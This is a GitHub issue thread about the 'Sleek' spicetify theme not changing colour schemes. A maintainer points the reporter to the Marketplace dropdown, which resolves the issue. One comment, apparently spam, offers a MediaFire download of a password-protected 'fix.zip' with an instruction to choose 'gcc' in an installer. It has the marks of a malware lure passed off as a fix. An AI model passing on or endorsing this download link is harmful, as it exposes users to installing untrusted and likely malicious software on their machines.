### ISSUE TITLE
sleek wont change colors

### ISSUE THREAD

**Issue by nolemoczij** [spicetify/spicetify-themes#1107]
so i'm using 
```
spicetify config color_scheme VantaBlack
spicetify apply
```
in powershell, spotify restarts, but nothing changes
https://imgur.com/a/M9aKwbz
what i'm doing wrong?

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by harbassan** [comment]
are you using marketplace? there should be a dropdown in the top right to change colour schemes there.

**Comment by nolemoczij** [comment]
> are you using marketplace? there should be a dropdown in the top right to change colour schemes there.

yep, found it. thanks!
